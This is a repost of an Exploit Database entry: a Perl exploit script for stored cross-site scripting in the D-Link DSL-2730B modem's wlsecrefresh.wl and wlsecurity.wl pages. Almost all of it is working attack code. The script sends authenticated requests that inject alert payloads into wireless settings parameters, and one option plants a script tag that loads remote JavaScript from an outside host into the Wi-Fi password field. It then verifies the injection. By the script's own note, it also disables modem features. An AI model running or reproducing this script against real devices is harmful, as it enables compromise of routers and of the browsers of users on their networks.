D-Link DSL-2730B Modem – Cross-Site Scripting Injection Stored Wlsecrefresh.wl & Wlsecurity.wl

• Exploit Database
• 107 阅读

• 作者： XLabs Security
  日期： 2015-01-11
• 类别：

  • webapps
  平台：

  • hardware
• 来源：https://www.exploit-db.com/exploits/35747/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138

  # Exploit Title: D-Link DSL-2730B Modem wlsecrefresh.wl & wlsecurity.wl Exploit XSS Injection Stored # Date: 11-01-2015 # Exploit Author: Mauricio Correa # Vendor Homepage: www.dlink.com # Hardware version: C1 # Version: GE 1.01 # Tested on: Windows 8 and Linux   #!/usr/bin/perl # # Date dd-mm-aaaa: 11-11-2014 # Exploit for D-Link DSL-2730B # Cross Site Scripting (XSS Injection) Stored in wlsecrefresh.wl # Developed by Mauricio Corrêa # XLabs Information Security # WebSite: www.xlabs.com.br # More informations: www.xlabs.com.br/blog/?p=339 # # CAUTION! # This exploit disables some features of the modem, # forcing the administrator of the device, accessing the page to reconfigure the modem again, # occurring script execution in the browser of internal network users. # # Use with caution! # Use at your own risk! #       use strict; use warnings; use diagnostics; use LWP::UserAgent; use HTTP::Request; use URI::Escape;     my $ip = $ARGV[0]; my $user = $ARGV[1]; my $pass = $ARGV[2]; my $opt = $ARGV[3]; $ip = $1 if($ip=~/(.*)\/$/);   if (@ARGV != 4){   print "\n"; print "XLabs Information Security www.xlabs.com.br\n"; print "Exploit for POC D-Link DSL-2730B Stored XSS Injection in wlsecrefresh.wl\n"; print "Developed by Mauricio Correa\n"; print "Contact: mauricio\@xlabs.com.br\n"; print "Usage: perl $0 http:\/\/host_ip\/ user pass option\n"; print "\n"; print "Options: 1 - Parameter: wlAuthMode \n"; print " 2 - Parameter: wl_wsc_reg \n "; print " 3 - Parameter: wl_wsc_mode \n"; print " 4 - Parameter: wlWpaPsk (Execute on click to exibe Wireless password) \n"; }else{   print "XLabs Information Security www.xlabs.com.br\n"; print "Exploit for POC D-Link DSL-2730B Stored XSS Injection in wlsecrefresh.wl\n"; print "Developed by Mauricio Correa\n"; print "Contact: mauricio\@xlabs.com.br\n"; print "[+] Exploring $ip\/ ...\n";   my $payload = "%27;alert(%27\/\/XLabsSec%27);\/\/"; my $ua = new LWP::UserAgent; my $hdrs = new HTTP::Headers( Accept => 'text/plain', UserAgent => "XLabs Security Exploit Browser/1.0" ); $hdrs->authorization_basic($user, $pass);   chomp($ip);   print "[+] Preparing...\n"; my $url_and_payload = "";   if($opt == 1){ $url_and_payload = "$ip/wlsecrefresh.wl?wl_wsc_mode=disabled&wl_wsc_reg=disabled&wlAuth=0&wlAuthMode=1$payload". "&wlKeyBit=0&wlPreauth=0&wlSsidIdx=0&wlSyncNvram=1&wlWep=disabled&wlWpa=&wsc_config_state=0"; }elsif($opt == 2){ $url_and_payload = "$ip/wlsecrefresh.wl?wl_wsc_mode=disabled&wl_wsc_reg=disabled$payload&wlAuth=0&wlAuthMode=997354". "&wlKeyBit=0&wlPreauth=0&wlSsidIdx=0&wlSyncNvram=1&wlWep=disabled&wlWpa=&wsc_config_state=0";   }elsif($opt == 3){   $payload = "%27;alert(%27\/\/XLabsSec%27);\/\/"; $url_and_payload = "$ip/wlsecrefresh.wl?wl_wsc_mode=disabled$payload&wl_wsc_reg=disabled&wlAuth=0&wlAuthMode=997354". "&wlKeyBit=0&wlPreauth=0&wlSsidIdx=0&wlSyncNvram=1&wlWep=disabled&wlWpa=&wsc_config_state=0";   }elsif($opt == 4){   $payload = "GameOver%3Cscript%20src%3D%22http%3A%2f%2fxlabs.com.br%2fxssi.js%22%3E%3C%2fscript%3E"; $url_and_payload = "$ip/wlsecurity.wl?wl_wsc_mode=enabled&wl_wsc_reg=disabled&wsc_config_state=0&wlAuthMode=psk%20psk2&wlAuth=0&". "wlWpaPsk=$payload&wlWpaGtkRekey=0&wlNetReauth=36000&wlWep=disabled&wlWpa=aes&wlKeyBit=0&wlPreauth=0&". "wlSsidIdx=0&wlSyncNvram=1";   }else{   print "[-] Chose one option!\n"; exit; }   my $req = new HTTP::Request("GET",$url_and_payload,$hdrs);   print "[+] Prepared!\n"; print "[+] Requesting...\n"; my $resp = $ua->request($req); if ($resp->is_success){   print "[+] Successfully Requested!\n";   my $resposta = $resp->as_string;   print "[+] Checking for properly explored...\n"; my $url = "$ip/wlsecurity.html"; $req = new HTTP::Request("GET",$url,$hdrs);   print "[+] Checking that was explored...\n";   my $resp2 = $ua->request($req);   if ($resp2->is_success){ my $result = $resp2->as_string; if($opt == 4){ $payload = "%27GameOver%3Cscript%20src%3D%5C%22http%3A%2f%2fxlabs.com.br%2fxssi.js%5C%22%3E%3C%2fscript%3E%27"; }   if(index($result, uri_unescape($payload)) != -1){ print "[+] Successfully Exploited!"; }else{ print "[-] Not Exploited!"; } } }else {   print "[-] Ops!\n"; print $resp->message; } }